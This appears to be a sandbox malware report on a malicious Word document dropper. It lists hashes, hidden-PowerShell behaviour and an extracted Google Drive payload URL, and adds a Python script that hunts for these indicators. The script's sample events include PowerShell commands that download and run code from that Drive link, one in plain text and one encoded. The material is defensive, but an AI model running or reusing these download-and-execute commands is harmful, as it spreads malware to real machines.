General

  • Target

    seebestthingswithreadyforgoodthingstogetmebackwithnice________________verynicepeopleswithoofdthingswh9chreallynicefrogoofdpeoples________verygoodpeopleswithnew.doc

  • Size

    111KB

  • Sample

    241029-qqbfaaxjcm

  • MD5

    b2daf885c5199ed93bfdafe0f3a33ae6

  • SHA1

    3d2dba1d76e2bfcae449113de1597d0c725b3421

  • SHA256

    e164bb4a190f79c58b836441a8f59bf3ead186f359fbac64b0e86e7e058c0efe

  • SHA512

    662cf497918cabc230d8f857826cf6ed67b58288bd1dd8f61c617fe41b0a9034acc957716aa6f4e860d5546652d158be9b0aaec231034a8dad5a533dcb8381e2

  • SSDEEP

    384:GSXY16lFxTu95qsyeYJZw9IHJkJhvO6CC9GBRKdEQj3Mh/xyc11wtSuQO7HBLOWk:hXc/XBoGGBgnj3Mh/71wtSuQULOWk

Score
10/10

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated

  • URLs

    ps1.dropper

    https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

    exe.dropper

    https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Targets

    • Target

      seebestthingswithreadyforgoodthingstogetmebackwithnice________________verynicepeopleswithoofdthingswh9chreallynicefrogoofdpeoples________verygoodpeopleswithnew.doc

    Score
    10/10
    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell with its display window hidden.

    • Legitimate hosting services abused for malware hosting/C2

    • Drops file in System32 directory
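The two behaviours above that are cheapest to hunt for elsewhere in an estate are the hidden-window PowerShell launch and the Google Drive direct-download URL from the extracted config. The following is an added example, not part of the sandbox report, showing detection logic for both run over constructed process-creation records (the command lines below are made up for this example; only the Drive file id is taken from the report). It goes beyond the page in two ways: it resolves PowerShell's abbreviated parameter forms (-w hidden, -win h, -w 1) rather than matching the literal string "-WindowStyle Hidden", and it also recognises the /file/d/<id>/ and drive.usercontent.google.com/download?id= forms of a Drive link, which the report does not show.

```python
"""Added example: hunt for hidden-window PowerShell and Google Drive droppers
in process command lines. Not the sandbox's own signature code."""
import base64
import binascii
import re
from urllib.parse import parse_qs, urlparse

# Drive file id from the report's extracted config (ps1.dropper / exe.dropper).
KNOWN_DRIVE_ID = "1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur"

_TOKEN = re.compile(r'"[^"]*"|\'[^\']*\'|\S+')
_URL = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted runs whole."""
    return [t.strip("\"'") for t in _TOKEN.findall(cmdline)]


def _is_prefix(token, full, minimum=1):
    # powershell.exe accepts any unambiguous prefix of a parameter name,
    # so -w, -win and -windowstyle all mean -WindowStyle.
    t = token.lower()
    return len(t) >= minimum and full.startswith(t)


def is_powershell(cmdline):
    toks = tokenize(cmdline)
    if not toks:
        return False
    image = toks[0].lower().rsplit("\\", 1)[-1]
    return image in ("powershell.exe", "powershell", "pwsh.exe", "pwsh")


def hides_window(cmdline):
    """True if the command line asks for -WindowStyle Hidden in any spelling.
    The value is matched loosely (any prefix of 'hidden', or the enum value 1)
    so that abbreviated forms are flagged rather than silently missed."""
    toks = tokenize(cmdline)
    for i, tok in enumerate(toks[:-1]):
        if tok[:1] in ("-", "/") and _is_prefix(tok[1:], "windowstyle"):
            value = toks[i + 1]
            if _is_prefix(value, "hidden") or value == "1":
                return True
    return False


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or None."""
    toks = tokenize(cmdline)
    for i, tok in enumerate(toks[:-1]):
        stem = tok[1:].lower()
        if tok[:1] in ("-", "/") and (stem == "ec" or _is_prefix(stem, "encodedcommand")):
            try:
                return base64.b64decode(toks[i + 1]).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError, ValueError):
                return None
    return None


def drive_download_id(url):
    """Return the Google Drive file id if url points at a Drive file, else None.
    Handles /uc?export=download&id=, /download?export=download&id= and /file/d/<id>/."""
    p = urlparse(url)
    if p.netloc.lower() not in ("drive.google.com", "drive.usercontent.google.com"):
        return None
    q = parse_qs(p.query)
    if p.path in ("/uc", "/download") and q.get("export", [""])[0] == "download":
        return q.get("id", [None])[0]
    parts = p.path.split("/")  # /file/d/<id>/view -> ['', 'file', 'd', '<id>', 'view']
    if len(parts) >= 4 and parts[1] == "file" and parts[2] == "d":
        return parts[3] or None
    return None


def analyze(event, known_ids=frozenset({KNOWN_DRIVE_ID})):
    """Return a list of finding tags for one process-creation event."""
    cmd = event["cmdline"]
    findings = []
    if not is_powershell(cmd):
        return findings
    if hides_window(cmd):
        findings.append("powershell_hidden_window")
    text = cmd
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append("powershell_encoded_command")
        text += " " + decoded  # URLs usually live inside the encoded stage
    for url in _URL.findall(text):
        fid = drive_download_id(url)
        if fid:
            findings.append("gdrive_download:" + fid)
            if fid in known_ids:
                findings.append("ioc_match:" + fid)
    return findings


# Constructed sample events for this example (not from the report's sandbox run).
_ENCODED_STAGE = base64.b64encode(
    ("Invoke-WebRequest 'https://drive.google.com/file/d/%s/view' -OutFile $env:TEMP\\s.exe"
     % KNOWN_DRIVE_ID).encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"pid": 4412, "cmdline": '"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" /n "C:\\Users\\user\\Downloads\\invoice.doc"'},
    {"pid": 5120, "cmdline": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('https://drive.google.com/uc?export=download&id=%s')\"" % KNOWN_DRIVE_ID},
    {"pid": 5300, "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"pid": 5400, "cmdline": "powershell.exe -NoP -NonI -W Hidden -Enc " + _ENCODED_STAGE},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["pid"], analyze(ev))
```

Matching on parameter prefixes rather than the literal `-WindowStyle Hidden` is the point of `hides_window`: the sandbox signature fires on behaviour, but a log-based hunt only sees the command line, and `-w hidden` or `-w 1` is what the dropper in the wild is more likely to use. The Drive id, not the full URL, is the stable IOC, since the same file can be fetched through several URL shapes.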

MITRE ATT&CK Enterprise v15

Tasks